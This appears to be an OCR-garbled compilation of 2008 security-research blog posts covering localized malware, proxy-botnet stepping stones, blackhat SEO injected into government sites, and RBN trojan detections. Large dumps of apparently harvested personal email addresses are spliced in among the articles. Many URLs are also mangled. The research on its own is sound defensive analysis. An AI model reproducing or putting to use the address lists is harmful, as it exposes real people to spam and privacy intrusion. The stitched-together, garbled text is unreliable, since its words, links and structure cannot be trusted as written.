noiseshit@poczta.fm 
marcjackel@web.de 

shiro _deathtrike@cegetel.net 
helmunt28@interia.pl 
baptiste.bouches@free.fr 
djtarzan@wanadoo.fr 
xxnikexx@freenet.de 
chcracco@numericable.fr 
thalya.eve@wanadoo.fr 
edryr@wanadoo.fr 
hytoni@noos.fr 
arild@nord-odal.info 
qlara@qlara.se 
treyjames0O1@suddenlink.net 
iluvmybabies83@bex.net 
joergen@boerglum.com 
lartho@jubii.dk 
yldg1709@att.net 
lars@yellowfloor.no 
marciopanisset@globo.com 
pm.sopot@interia.pl 
bombonelbun@yahoo.com 
szysza94@interia.pl 
grzechu24katowice@interia.pl 
mikoba73@interia.pl 
cba76@interia.pl 
jb.predator@interia.pl 
kalorycznosc@interia.pl 
kuba.qqql@interia.pl 
lukanio666@poczta.fm 


zenek2828283@poczta.fm 
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marekwd10@interia.pl 
grzywa81@interia.pl 
max2412dr@interia.pl 
stas19891@interia.pl 
kaputnikmart@ok.de 
ciumbos@poczta.fm 
szimmermann@romandie.com 
minidragonhd@ok.de 
davidstochI@seznam.cz 
ehyx@interia.pl 
baki27071988@interia. pl 
mantix13@interia.pl 
mariuszwp@poczta.fm 
ostry181@interia.pl 
naskon@mail.bg 
vor.1@yandex.ru 
pokasz2@interia.pl 
vojtisek2014@email.cz 
bnitschirch@t-online.de 
leonduelks@t-online.de 
zobol123@interia.pl 
irenka.dvorakova@seznam.cz 
mathes.23@seznam.cz 
thebeast112@ok.de 
wojtal7000@interia.pl 
mkkgb@interia.pl 
grzesmen91@interia. pl 
zszarubova25@seznam.cz 
kubik.gin2@seznam.cz 
dawidszczesny777@interia.pl 
V.a.j.g.y@seznam.cz 
petr.fridrich@seznam.cz 
dominik@koehalmi.hu 
michal1116@interia.pl 
rusekmarek@seznam.cz 
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sewo96@interia.pl 
renemaus0815@freenet.de 
liglick@seznam.cz 
gilthez@free.fr 
fusit15@interia.pl 
elvismen@interia.pl 
dandokan2@seznam.cz 
kira yune@freenet.de 
julien.mestre93@orange.fr 
julien _lemasson@orange.fr 
damian45133@interia.pl 
silver162@aliceadsl.fr 
toni.rosu@tiscali.it 
keule88@freenet.de 
thekoenna@freenet.de 
cbrulle@free.fr 
lucaskellinghusen@t-online.de 
maxi.muth@freenet.de 
lornes-zone@freenet.de 
xppppp@jubii.dk 
frankandmelanie@hsfx.ca 
lesiucool@interia.pl 
rom1.vernier@wanadoo.fr 
sevin-ibrahim@t-online.de 
jm.vandecasteele@wanadoo.fr 
nico-raidt@freenet.de 
jenka@akol.se 
bazon59@free.fr 
lerikusya@mail.ru 
karapyz710@mail.ru 
lazy77@mail.ru 
wwl10_10@mail.ru 
tunss33@yandex.ru 
yana23 _1000@mail.ru 


book sergey@mail.ru 
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nikitatO6@mail.ru 

fucker 30@mail.ru 
lipovwev@mail.ru 
tfk.vasa@bk.ru 
sarychevvladimir@mail.ru 
vladimir-ignatenko-01@mail.ru 
lado _lado96@mail.ru 
manicipa@mail.ru 
123.mars@bk.ru 

artem _shargaev@list.ru 
sasha _dubinin _2013@mail.ru 
poof0092@mail.ru 
ganstaal990@maail.ru 
lada230978@yandex.ru 
sas.1.88@mail.ru 
akkaunt96@inbox.ru 
beshanov-aleksandr@mail.ru 
grolove3@yandex.ru 
den28222@yandex.ru 
ms.mapap@mail.ru 
popkov.numizmat@yandex.ru 
akimoff.georgy2015@yandex.ru 
oleg.podgatec78@mail.ru 
89043716140@mail.ru 
men30002001@mail.ru 
nlerikusya@mail.ru 
nkarapyz710@mail.ru 
nlazy77@mail.ru 
nwwl10_10@mail.ru 
ntunss33@yandex.ru 
nyana23 _1000@mail.ru 
nbook sergey@mail.ru 
nnikitatO6@mail.ru 

nfucker 30@mail.ru 
nlipovwev@mail.ru 
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ntfk.vasa@bk.ru 
nsarychevvladimir@mail.ru 
nvladimir-ignatenko-O1@mail.ru 
nlado _lado96@mail.ru 
nmanicipa@mail.ru 
n123.mars@bk.ru 

nartem _shargaev@list.ru 
nsasha _dubinin _2013@mail.ru 
npoof0092@mail.ru 
nganstaa1990@mail.ru 
nlada230978@yandex.ru 
polya.ignatenko@yandex.ru 
ekapod@yandex.ru 
rhjgjnjd@yandex.ru 
hjvfytyjxrfcegth@yandex.ru 
percoffka@yandex.ru 
banan6781@yandex.ru 
minaevva@yandex.ru 
vyamakarenko@yandex.ru 
roman.kislyak@yandex.ru 
andgus12@yandex.ru 
syperkovboi44@yandex.ru 
izidal23@yandex.ru 
tumanov33@yandex.ru 
kiruha85@yandex.ru 
vladzavalskiy@yandex.ru 
poltoranina.katia@yandex.ru 
likeamoon3@yandex.ru 
yurchenko.ekater@yandex.ru 
barkanov.slavik@yandex.ru 
hdhsg.hghjf@yandex.ru 
natasha301078@yandex.ru 
haki31russ@yandex.ru 
medvO8@yandex.ru 


daenerys@yandex.ru 
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missis.olga84@yandex.ru 
bezpeka2009@yandex.ru 
borbot2009@yandex.ru 
alinka.poznichenko@yandex.ru 
elenagor2008@yandex.ru 
dd863@yandex.ru 
syrniypon4ik@yandex.ru 
pyankovasv@yandex.ru 
liza-369@yandex.ru 
gshark6@yandex.ru 
djkingfish@yandex.ru 
manchest7@yandex.ru 
vfvf2311@yandex.ru 
scream767@yandex.ru 
n.bilina@yandex.ru 
daim3438@yandex.ru 
ivannov2014@yandex.ru 
a-207161@yandex.ru 
lemonrc@yandex.ru 
wizars260@yandex.ru 
tjaleksa@yandex.ru 
natasham1982@yandex.ru 
devide737@yandex.ru 
a222ad@yandex.ru 
seruy0991@yandex.ru 
alex61197141@yandex.ru 
deineka.yury@yandex.ru 
ena20052005@yandex.ru 
mary808@yandex.ru 
perfect345@yandex.ru 
kkk790@yandex.ru 
syva07@yandex.ru 
combat4444@yandex.ru 
lady.pol2009@yandex.ru 
gsm06@yandex.ru 
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shvec@yandex.ru 
natasha-matilek@yandex.ru 
andrey.kolmakoff2010@yandex.ru 
pomashka.pomashka@yandex.ru 
morozova.morozova-2011@yandex.ru 
toxic945@yandex.ru 
kta.kot@yandex.ru 
nuromik28@yandex.ru 
ignmar@yandex.ru 
mister.andre2011@yandex.ru 
puaro-1@yandex.ru 
karamelkaz11@yandex.ru 
ez-01-1-09010@yandex.ru 
energopotenzial@yandex.ru 
lvdplsilver4@yandex.ru 
vid9ka88@yandex.ru 
natashbusi@yandex.ru 
divirion@yandex.ru 
smailovskaya@yandex.ru 
traktat-O0O@yandex.ru 
ekaterina.tolkina@yandex.ru 
companyflag@yandex.ru 
nikita-frolenko@yandex.ru 
mangos38@yandex.ru 
ad-des@yandex.ru 
smail972010@yandex.ru 
broad666@yandex.ru 
pero.138@yandex.ru 
haninal958@yandex.ru 
reefl2@yandex.ru 
ku4erencko.marina@yandex.ru 
condr1023@yandex.ru 
andrey.terehov5@yandex.ru 
j5gty5@yandex.ru 
avonc55204@yandex.ru 
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helen.aniskina@yandex.ru 
twistl1408@yandex.ru 
megakull@yandex.ru 
a3371537@yandex.ru 
avoril@yandex.ru 
alek.crukow@yandex.ru 
jOpOpO@yandex.ru 
grisha.dmitry@yandex.ru 
you-tube2@yandex.ru 
dj-oleg3@yandex.ru 
romankizim@yandex.ru 
malahova.maria218@yandex.ru 
apostl94@yandex.ru 
bgcby@yandex.ru 
anyu.yuriewa2010@yandex.ru 
ku4in.konstantin@yandex.ru 
energolx@yandex.ru 
natasokola@yandex.ru 
toliks2008@yandex.ru 
skrypochka@yandex.ru 
nat9466@yandex.ru 
helen2to@yandex.ru 
pol-strunina@yandex.ru 
technologyall@yandex.ru 
asd.sdasd2014@yandex.ru 
irina-eramin-red@yandex.ru 
yaprostoksusha@yandex.ru 
t.a.k.6 1 @yandex.ru 
gokik2010@yandex.ru 
megatron1802@yandex.ru 
djon007007@yandex.ru 
smolyaninowa.anastasiya@yandex.ru 
w531@yandex.ru 
oscher@yandex.ru 


natatallo@yandex.ru 
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4.2.16 Localizing Cybercrime - Cultural Diversity on Demand (2008-02-22 00:34) 


GSW - Kicrosoft Internet Explorer -|5} x) 
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IE XP ALL 
QuickTime 
Win2000 
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MySQL-based 
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Cultural diversity on demand is something | anticipated as a [1]future malware trend two 
years ago - "Localization as a concept will attract the coders’ attention" : 


"By localization of malware, | mean social engineering attacks, use of spelling and gram- 
mar free native language catches, IP Geolocation, in both when it comes to future or current 
segmented attacks/reports on a national, or city level. We are already seeing localization 
of phishing and have been seeing it in spam for quite some time as well. The “best” 
phish attack to be achieved in that case would be, to timely respond on a nation-wide 
event/disaster in the most localized way as possible. If | were to also include intellectual 
property theft on such level, it would be too paranoid to mention, still relevant | think. Abusing 
the momentum and localizing the attack totarget specific users only, would improve its 
authenticity. For instance, I’ve come across harvested emails for sale segmented not only on 
cities in the country involved, but on specific industries as well, that could prove invaluable 
to a malicious attack, given today’s growth in more targeted attacks, compared to mass ones." 


It’s been happening ever since, and despite that it’s already getting the attention of 
vendors, [2]malware authors do not need to know any type of foreign language to spread 
malware, spam and phishing emails in the local language, they do what they’re best at (coding, 
modifying publicly obtainable bots source code), and outsource the things they cannot do on 
their own - come up with a locally sound message which would leter on be used for localized 
malware, spam and phishing attacks, a tactic with a higher probability of success if there 
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andrey.vorowsky1@yandex.ru 
val.nechiporuk2009@yandex.ru 
rocka2009@yandex.ru 
pytui2@yandex.ru 

jul. volkowa@yandex.ru 
enhome2013@yandex.ru 
tygaringarin@yandex.ru 
djppc@yandex.ru 
valmont111@yandex.ru 
helenova.yalalova@yandex.ru 
sfinix89@yandex.ru 
ser98903591@yandex.ru 

vit. vasenin@yandex.ru 
cammer@yandex.ru 
jasmanva@yandex.ru 
yul91870750@yandex.ru 
polina.lazarewa2012@yandex.ru 
ceofoosl1@yandex.ru 
pertenava.nino@yandex.ru 
eni.ne4aeva@yandex.ru 
artem061100@yandex.ru 
alena.dn.ua@yandex.ru 
ponomarenko05091990@yandex.ru 
alexey.khamitsevich@yandex.ru 
irina35h@yandex.ru 
mister.mikhail80@yandex.ru 
rat-igor@yandex.ru 
zenchikt@yandex.ru 
kennyfromsouthpark@yandex.ru 
davliatgarieva@yandex.ru 
ratt1960@yandex.ru 
kozelsapr@yandex.ru 
Ijhasdiknf@yandex.ru 
sve-poryvaj@yandex.ru 


swbn@yandex.ru 
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bgrabovsky@yandex.ru 
baton851@yandex.ru 
alekchuprina@yandex.ru 
dima-gerlak@yandex.ru 
ler.kataeva@yandex.ru 
edgaralfredo@fastmail.com.au 
reg.cahill@flinders.edu.au 
novasciamg@aol.com 

br behera@yahoo.com 
p.muller@law.uu.nl 
karacabe@politics.ankara.edu.tr 
alexandre.debrevern@ebgm.jussieu.fr 
czavos@hotmail.com 
dorothy@equityineducation.org 
sntraina@yahoo.com 
mikede@optonline.net 
susanm@thebookhouse.com 
librairie@luginbuhl.fr 
hammad.ather@aku.edu 
docleek@uark.edu 
peerzaad@hotmail.com 
hourmat@fsdmfes.ac.ma 
jianhuage@msn.com 
iyip@aol.com 
Hamedoun@hotmail.com 
apashak@ucalgary.ca 

e _trushkin@inbox.ru 
lit4212@mail.ru 
ambrella4890@mail.ru 
juliarpdv@hotmail.com 
EvanxoFlueurlleben@hotmail.com 
umAdsuelaStaakots@hotmail.com 
ybDaphonineSevytser@hotmail.com 
RgoobbCygarevry@hotmail.com 
adzyTdoonalolson@hotmail.com 
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heimdallr@swissjabber.ch 
den.sahibgariev2@ya.ru 
olga-kostousova@mail.ru 
zubova-mariya@mail.ru 
kashin.mihail@mail.ru 
misha.vinnik.2001@yandex.ru 
mserjy@yandex.ru 
fedik-r@yandex.ru 
durilo-4@yandex.ru 
nataha2157@qip.ru 
markizalnk@mail.ru 
sex-roma2011@yandex.ru 
vitaly.khlopkov@ya.ru 
fim172@qip.ru 
kisdam56@qip.ru 
ericadmanthe@gmail.com 
hugasek@interia.p 
leon-turni@t-online.de 
henribui@wanadoo.fr 
petrellafranco@tiscali.it 
kevin.michalski@t-online.de 
christophe.barbou@aliceadsl.fr 
xxkallexx67@web.de 
angelo.corallo@orange.fr 
fabien.rigal@aliceadsl.fr 
elsoery@t-online.de 
leroi.df1@aliceadsl.fr 
domspit@aliceadsl.fr 
andretennis@tiscali.it 
yanmachado@globo.com 
anthime.galerne@aliceadsl.fr 
stephane.audet@aliceadsl.fr 
caillaud.theo@aliceadsl.fr 
kontakt@usbnet.dk 


cuenotpuce@aliceadsl.fr 
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tb160377@freenet.de 
termit22091986@yandex.ru 
schiggi _1982@freenet.de 
andreasmarx1965@aol.com 
richardegydy@seznam.cz 
coreyb0727@aol.com 
frol-alex300@yandex.ru 
a-rzepecki@wp.pl 
xbmadman@aim.com 
kostik-1989@narod.ru 
vedmakts4@yandex.ru 
leto-leyn@yandex.ru 
mathis@jubii.dk 
rom-blade@wanadoo.fr 
matrix eco _unit@web.de 
renenfs1@freenet.de 
s.pietruska@t-online.de 
veterok@lds.net.ua 
lavrik@vtomske.ru 
chuvak03-09-99@yandex.ru 
ylal@free.fr 
tim.wittkowski@t-online.de 
wojtiks@interia.pl 
zbysio997@interia.pl 
o-zocker@t-online.de 
adorso@free.fr 

rodzin k@interia.pl 
rodrigue.eugridor@orange.fr 
quentindefiguerredo@wanadoo.fr 
i.idiot@freenet.de 
timo-gerber@t-online.de 
stalkerziom@interia. pl 
xray321@wp.pl 
dj-stone@freenet.de 
edgarsantos84@oi.com.br 
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mihawk4@freenet.de 
c.c.j@t-online.de 
siwun@ok.de 
demoniastina@free.fr 
mateogabli@interia.pl 
daniel-ruester@t-online.de 
matze.sliwka@freenet.de 
cedric.coet@free.fr 
lordfire65 @free. fr 
wklamka@interia.pl 

patrik steinbach@t-online.de 
c.judmann@freenet.de 
loan74@wanadoo.fr 
cornelius.bakan@t-online.de 
awiktorowski@interia.pl 
mtardifsaulnier@videotron.ca 
antekmatula@interia.pl 
smeagol69@free.fr 
nicolasgul@t-online.de 
alexcourvoisier1 @free.fr 
gry638@interia.pl 
greggiwuddi@t-online.de 
k8kpol@interia.pl 
liebling84@t-online.de 
el.floflo@aliceadsl.fr 
o.rigoulot@free.fr 
subway6@freenet.de 
gillou.bld.64@orange.fr 
prokamil200@interia.pl 
lukas.hadamik@t-online.de 
falconst@aliceadsl.fr 
noizer@t-online.de 
o.vanmarque@free.fr 
sanderva@telenet.be 


tomgriessbach@onlinehome.de 
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igor barros@oi.com.br 
hugo.credaro.provins@aliceadsl.fr 
also80@orange.fr 
geenie1983@t-online.de 
helo20@freenet.de 
fas-fas@t-online.de 
jpbill@videotron.ca 
maxlongarini@tiscali.it 
philippersb@cogeco.ca 
kuba19009@interia.pl 
xshottplay@wp.pl 
thetiger16@interia.pl 
gokhan-kh@orange.fr 
pattyx@freenet.de 
antoineseemann@orange.fr 
frupital6@freenet.de 
graziella.serier@orange.fr 
krakenouane@numericable.com 
marvin.will@freenet.de 
icetea79@freenet.de 
ryszardowap@interia.pl 
jettjoshua@yahoo.com 
peter.kaal@freenet.de 
furlu@wanadoo.fr 
t-boxter@freenet.de 
minitiger1005@freenet.de 
petitbouchon62@orange.fr 
pizza3000@ymail.com 
kgr2@free.fr 
doges0213@ymail.com 
hyperdyk@freenet.de 
nicounivers@numericable.com 
masegosat@aliceadsl.fr 
roy-steffen@freenet.de 
rakoldinio@interia.pl 
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hadrien.cedelle@wanadoo.fr 
leopaul.bauthamy@orange.fr 
arttu.ra@suomi24.fi 
voin _2@mail.bg 
votoarts@email.com 
jaymepoon@email.com 
arn.lebreton@free.fr 
zero _hsz@hanmail.net 
sadehk@globo.com 
momo.11111@t-online.de 
danychy@t-online.de 
i33t@interia.pl 
payton.norrod@ymail.com 
tllevequin@free.fr 
denir@free.fr 
emersongj@usa.com 
bangbdnk@yahoo.com 
dominikl2a6@wp.pl 
lawskiszymon@wp.pl 
simon.proksch@seznam.cz 
xxxiii@freenet.de 
mikuch30@interia.pl 
piniek3@interia.pl 
brunotunin@bol.com.br 
rnpr@jubii.dk 
kapi1432@interia.pl 
nowy13l@interia.pl 
saulocruzds@bol.com.br 
nathan.cherrey@free.fr 
monktopia@att.net 
cot _dien@freenet.de 
stuffedtiger@windstream.net 
muchaj7@interia.pl 
tibiarzadzil@wp.pl 
dorian.b@wp.pl 
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brainjak@freenet.de 
eryk01052005@interia. pl 
axel preney25@orange.fr 
luffy@otakumail.com 
dirkpe@onlinehome.de 
cedric.a.alex@wanadoo.fr 
jpedrocasagrande@terra.com.br 
boby0017@freenet.de 
nlfiltersoam@free.fr 
geraldvaillant@noos.fr 
loeek94@free.fr 
wcwfalk@t-online.de 
julessurf@free.fr 
swigs01@iinet.net.au 
alain.galvani@aliceadsl.fr 
riosalado@terra.com 
damien42340@free.fr 
fenryldarioto@free.fr 
escrime-vic@aliceadsl.fr 
chrispolard@free.fr 
carratfabien@free.fr 
jezyk94@interia.pl 
arthur.zalesny@numericable.fr 
sylvain.mortreux@free.fr 
walter832@freenet.de 
marvin25id@gmx.de 
flo.falke@gmx.de 
johannes.hirling@gmx.de 
meinhardtsrohr@yahoo.de 
marc-letter@t-online.de 
phil071@free.fr 
fhammel.nieder@free.fr 
yyh.guegan@orange.fr 
ottonello.luca@fastwebnet.it 
karol25564@interia. pl 
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charly.m95@orange.fr 
minecraft ender kox _pvp@interia.pl 
xdrafiko@interia.pl 
sylvlhrd@orange.fr 
stephan.bruhn@t-online.de 
herrera.q@orange.fr 
fryho12@interia.pl 
benjamin-kunkel@t-online.de 
smallketing@orange.fr 
rodrigo avila@ig.com.br 
webplanet@freenet.de 
f.fuller@t-online.de 
martalus@free. fr 
lukas.melchior@t-online.de 
robobro@freenet.de 
owucpl@wp.pl 
cd006b0597@blueyonder.co.uk 
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were to also request that spammers can segment the harvested email databases for better 
campaign targeting. [3]The Release of Sage 3 - The Globalization of Malware : 


"In this issue we look at the growing trend of localization in malware and threats. Cy- 
bercriminals are increasingly crafting attacks in multiple languages and are exploiting popular 
local applications to maximize their profits. Cybercrooks have become extremely deft at 
learning the nuances of the local regions and creating malware specific to each country. 
They’re not just skilled at computer programming they’re skilled at psychology and linguistics, 
too." 


With all due respect, but | would have agreed with this simple logic only if | wasn’t aware 
of translation services on demand for anything starting from malware to spam and phishing 
messages. We can in fact position them in a much more appropriate way, as "cultural diversity 
on demand" services, where local citizens knowingly or unknowingly localize messages to be 
later on abused by malicious parties. Malware authors aren’t skilled at linguistics and would 
never be, mainly because they don’t even have to build this capability on their own, instead 
outsource it to cultural diversity on demand translation services, ones that are knowingly 
translating content for malware, spam and phishing campaigns. 


The perfect example would be [4]MPack and IcePack’s localization to Chinese, and [5]yet 
another malware localized to Chinese, as these two kits are released by different Russian 
malware groups, but weren’t translated by them to Chinese, instead, were localized by the 
Chinese themselves having access to the kits - a flattery for the kits’ functionality, just like 
when a bestseller book gets translated in multiple languages. As for the socioeconomic 
stereotype of unemployed programmers coding malware, envision the reality by considering 
that [6]sociocultural, rather than socioeconomic factors drive cybercrime, in between the high 
level of liquidity achieved of course. 


ttp://packetstormsecurity.org/papers/general/malware-trends. pdf 


ttp://ap. google. com/article/ALeqM5 junrStakWMq3INJYWBPc19YVKbSwD8UU0IKO0 
ttp://www.avertlabs.com/research/blog/index. php/2008/02/21/the-release-of-sage-3-the-globalization-of-ma 


1 
2 
3. 


ttp://ddanchev .blogspot.com/2007/09/custom-ddos-capabilities-within-malware.htm 


6. http: //ddanchev. blogspot .com/2008/01/e-crime-and-socioeconomic-factors.htm 
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4.2.17 Malware Infected Hosts as Stepping Stones (2008-02-22 04:59) 
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The following service that’s offering socks hosts on demand, is pretty much like the [1]Botnet 
on Demand one, with the only difference in its marketing pitch, namely, these are malware 
infected hosts as well, however, access is offered through them, but not to them. The degree 
of maliciousness of these hosts can only be measured once the exact IPs are known, and by 
degree of maliciousness I’m refering to their state of openess, namely, can malware, spam and 
phishing be also relayed through them, or we can eventually look up the historical IP reputation 
to figure out whether such activities have been going on in the past as well. Moreover, such 
commercial propositions are directly related with proxy threats, ones outlined in a KYE paper 
entitled "[2]Proxy Threats - Port v666" discussing various detection and mitigation approaches : 


"In typical proxybot infections we investigate proxy servers are installed on compromised 
machines on random high ports (above 1024) and the miscreants track their active proxies by 
making them "call home" and advertise their availability, IP address, and port(s) their proxies 
are listening on. These aggregated proxy lists are then used in-house, leased, or sold to 
other criminals. Proxies are used for a variety of purposes by a wide variety of people (some 
who don’t realize they are using compromised machines), but spam (either SMTP-based or 
WEB-based) is definitely the top application. The proxy user will configure their application 
to point at lists of IP:Port combinations of proxybots which have called home. This results in 
a TCP connection from the "outside" to a proxybot on the "inside" and a subsequent TCP (or 
UDP) connection to the target destination (typically a mail server on the outside)." 


The commercial aspect’s always there to say, and vertically integrate since besides sell- 
ing the product in the form of the tool for, they could eventually start coming up with various 
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related, and of course malicious services in the form of spamming, phishing etc. It’s perhaps 
more interesting to discuss the big picture. Once a great deal of these malware infected hosts 
is accumulated in such a way, there’s no accountability, and these act as stepping stones for 
[3lany kind of [4]cybercrime activities, [5]as well as the foundation for other services such as 
the [6]managed fast-flux provider | once exposed. 


Stepping stones as a concept in cyberspace, can be used for various purposes such as, 
engineering cyber warfare tensions, [7]virtual deception, hedging of risk of getting caught, 
or actually risk forwarding to the infected party/country of question, [8]PSYOPs, the scenario 
building approach can turn out to be very creative. One of the main threats possed by the 
use of infected hosts as stepping stones that I’ve been covering in previous posts related to 
[9]China’s active cyber espionage and cyber warfare doctrine, is that of on purposely creating 
a twisted reality. China’s for instance the country with the second largest Internet population, 
and will soon surpass the U.S, logically, it would also surpass the U.S in terms of malware 
infects hosts, and with today’s reality of malware, spam and phishing coming from such, China 
will also undoubtedly top the number one position on malicious activities. 


However, with lack of accountability and so many infected hosts, is China the puppet master 
the mainstream media wants you to believe in so repeatedly, or is the country’s infrastructure 
a puppet itself? One thing’s for sure - asymmetric and cost-effective methods for obtaining 
[10]foreign intelligence and [11]research data is on the top of the agenda on every government 
with an offensive cyber warfare doctrine in place. 


. http://ddanchev. blogspot .com/2007/10/botnet-on-demand-service.htm 

. http://www. honeynet.org/papers/proxy/index.htm 

. http: //ddanchev.blogspot .com/2007/10/fast-f1lux-spam-and-scams- increasing. html 
. http: //ddanchev. blogspot .com/2007/10/love-is-psychedelic-too.htm 


. http: //ddanchev . blogspot . com/2007/08/commercial-click-fraud-tool .html 

- http: //ddanchev. blogspot . com/2007/11/managed-fast-flux-provider. html 

. http://ddanchev. blogspot .com/2007/12/phishers- spammers-and-malware-authors.html 
. http: //ddanchev. blogspot . com/2006/09/internet-psyops-psychological. htm 

. http: //ddanchev.. blogspot . com/2007/09/chinas- cyber-espionage-ambitions html 
10. http: //ddanchev. blogspot . com/2007/04/osint-through-botnets . htm] 

11. http: //ddanchev. blogspot . com/2007/05/corporate- espionage-through~botnets. html 
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Tramadol, Tramadol hci overdoses, Acyclovir online pharmacy prevacid tramadol. Pharmacy 
tramadol hel dosing. Tramadol use in animals 

ww. idtheft. utah. gowpn/modules/pagesetter/ 

pntemplates/plugins/function. str. php?Aramadoltramadol. html - 34k - Cached - Similar pages 


Metformin. Purchase metformin online. Metformin and grapefruit ... 

Metformin. Buy metformin. Metformin and grapefruit. Metformin side effects. Metformin pcos 
teenager. Purchase metformin online. Metformin buy metformin ... 

www. idtheft. utah. gow/pn/modules/pagesetter/ 

pntemplates/plugins/function. str. php?/metformin/metformin. html - 32k - 


Cached - Similar pages 


Cipro. Side effects from taking cipro. Pond filter cipro. Buy... 

Cipro, Cipro 250 for canine. Buy cheap cipro online. Cipro side effects of cipro. Action cipro 
Pond filter cipro. Online pharmacy cipro. Buy cipro pills 

www. idtheft. utah. gowpn/modules/pagesetter 

pntemplates/plugins/function. str. php?/cipro/cipro. html - 31k - Cached - Similar pages 


Adipex. Adipex online pharmacy childrensmuseumofoakridge org ... 

Adipex. Adipex p phentermine hydrochloride side effects. Prescription weight loss adipex. 
Brand adipex. Adipex cost with insurance. 

ww. idtheft. utah. gow/pn/modules/pagesetter/ 

pntemplates/plugins/function. str. php?/adipex/adipex.himl - 33k - Cached - Similar page: 


Zithromax. Acne vulgaris zithromax. Buy zithromax. Zithromax... 

Zithromax. Nursing indications for zithromax. Buy cheap zithromax online. Buy zithromax 
Drug class for zithromax. Zithromax in toddlers 

www. idtheft. utah. gow/pn/modules/pagesetter/ 

pntemplates/plugins/function. str. php?/zithromax/zithromax. html - 32k - 


Cached - Similar pages 


Alprazolam. Cheapest alprazolam online. Drug interactions wath ... 
Alprazolam. Alprazolam prescriptions. Alprazolam 2mg overseas pharmacy. Cheapest 
alprazolarn online. Alprazolam 2mg overnight no prescription 


wee tbl wbebs senda dace dite 


As it’s becoming increasing clear that blackhat SEOers are actively experimenting with em- 
bedding their content on high pagerank sites, [1]such as .govs, the [2]numerous campaigns, 
one of which was by the [3]way serving malware, indicate that injection the content through 
remote file inclussion or remotely exploitable web application vulnerabilities is an emerging 
trend that deserves to be closely examined. Here are several more currently active blackhat 
SEO campaigns located at : 


- Utah Attorney General’s Office Identity Theft Reporting Information System - 
idtheft.utah.gov/pn/modules/pagesetter/pntemplates/plugins - 20, 200 SEO pages 


- Mid-Region Council of Governments - mrcog-nm.gov/includes/phpmailer/language - 3, 
630 pages 
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- Readyforwinners e-magazine - readyforwinners.hertscc.gov.uk/templates /2 - 890 SEO 
pages 


- National Homecare Council - homecare.gov.uk/nhcc.nsf/discmainview - 220 SEO pages 
- Washington Wing Website - wawg.cap.gov/calendar/editor/themes/simp le - 93 SEO pages 


- Fauquier County - fauquiercounty.gov/government/departments/procurement - 69 SEO 
pages 


- Wisconsin Department of Military Affairs - dma.wi.gov/mediapublicaffairs - over 1,000 
pages embedded with "[4]invisible SEO content" meaning the content is also visible to search 
engines just like the one in a previous assessment 


The number of pages currently hosted at these high pagerank domains is indeed dis- 
turbing, but here comes the juicy part in the form of yet another "invisible blackhat SEO" 
campaign, where outgoing links and SEO content is embedded at the host, but is only visible 
to web crawlers. Take the Wisconsin Department of Military Affairs’s site for instance, where a 
news item that was posted in 2003, yes five years ago, is still embedded with "invisible black- 
hat SEO content" in between a fancy javascript obfuscation that once deobfuscated tries to 
connect to a third-party host feeding it with referring keywords, sort of keywords blackhole for 
optimizing future SEO campaigns based on increasing or decreasing popularity of specific ones. 


Sampling the outgoing links also speaks for itself, take canadianmedsworld.com 
(217.170.77.162) for instance, and the fact that a great deal of outgoing links also re- 
spond to nearby IPs within the scammy ecosystem (217.170.77.*) such as : 


canadianpharmacyltd.org 
ns1.viagrabestprice.info 
ns2.viagrabestprice.info 
officialmedicines.us 
pharm-shop.net 
thecanadianpharmacymeds.com 
viagrabestprice.info 
viagraforlove.com 

xdrugpill.com 


This is perhaps the perfect moment to clarify that the appropriate people responsible for 
auditing and securing these hosts, are already doing their forensics job and are coming up 
with more data, on how it happened, when it happened, and who could be behind it - an 
example of threat intell sharing a concept that should be getting more attention than it is for 
the time being. So far, there haven’t been repeated incidents like the malware serving ones 
| assessed in previous posts, but as it’s obvious they’re automatically capable of embedding 
and locally hosting any content, it’s only a matter of intentions in this case. 


1. ftp: //adanchev. blogspot. cox/2008/02/contimuing-gov-blackat~seo-canpalga htsl 
2, http: //Adanchev. blogspot. con/2007/11/pOrngor-ongoing-blackhat~see-operation hal 
3. hetp://ddanchev. blogspot. com/2007/10/cospronised-sites-serving-nalvare-and. neal 
4. http: //ddanchev. blogspot . com/2008/01/invisible-blackhat—seo- campaign. html 
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4.2.19 RBN’s Malware Puppets Need Their Master (2008-02-26 17:20) 


Date Risk Origin Findings 

26.02.2008 11:09:54 all Trojan.DL.Agent.KTG, Trojan-Downloader. Win32.Agent.bnm, Trojan Horse.. 
24.02.2008 16:54:35 atl r TrojanSpy.BrokerA, Generic.dx, TSPY_BANKRYPT.X, Trojan-Spy.Zbot, New.. 
24.02.2008 08:28:09 well TrojanSpy. ZBot.Gen!Pac.3, Spy-Agent.g.gen, BKDR_AGENT. SHH, Trojan-Spy.Zbot 
24.02.2008 07:34:18 tll TrojanSpy.ZBot.Gen!Pac.3, Spy-Agent.g.gen.|, TSPY_BANKRYPT.X, Trojan-Spy.Zbot 
23.02.2008 07:40:36 well ; Trojan-Proxy.AgentisdS, Trojan-Proxy. Win32,Agent.ly, Backdoor. Trojan.. 
23.02.2008 07:38:54 ll Trojan-PWS.Tanspy, Trojan. Win32.Small.lh, Trojan. Satiloler.6, Generic.dx.. 
23.02.2008 07:34:26 tll Trojan-PWS.Tanspy, Trojan. Win32.Small.lh, Trojan. Satiloler.8, Generic.fe.. 
20.02.2008 08:15:24 well Trojan.PWS.2bot.D, Trojan-Spy. Win32.Zbot.n, Spy-Agent.bw.gen, TSPY_BANKRYPT.X.. 
19.02.2008 21:35:12 well f TrojanSpy.ZBot.Gen!Pac.3, Spy-Agent.bw, TSPY_ZBOT.BK, Trojan-Spy.Zbot 
17.02.2008 13:51:48 etl 2 TrojanSpy.ZBot.Gen!Pac.3, Spy-Agent.g.gen, TSPY_ZBOT.AY, Trojan-Spy.Zbot 
16.02.2008 23:58:17 well TrojanSpy.Agent. WEQ, Spy-Agent.g.gen, BKOR_AGENT.ACR, Trojan-Spy.Zbot 
15.02.2008 18:29:33 atl TrojanSpy.ZBot.Gen!Pac.3, Spy-Agent.q.gen, TROJ_ZBOT.R, Trojan-Spy.Zbot 
14.02.2008 12:12:06 tll r Packed/Upack, Downloader, Generic Downloader.y, TROJ_DLOADER, VAK 
14.02.2008 11:07:40 wll Trojan-Downloader. Win32.Agent.bnm, Downloader, Generic.dx, TROJ_AGENT.ZMB.. 
14.02.2008 07:27:23 atl Trojan.DR.Cimuz.Gen.1, Packed. Win32.PolyCrypt.d, Infostealer, PolyCrypt-Packed.. 
12.02.2008 11:34:04 etl TrojanSpy.ZBot.Gen!Pac.3, Spy-Agent.bw, TSPY_BANKRYPT.X, Trojan-Spy.Zbot 
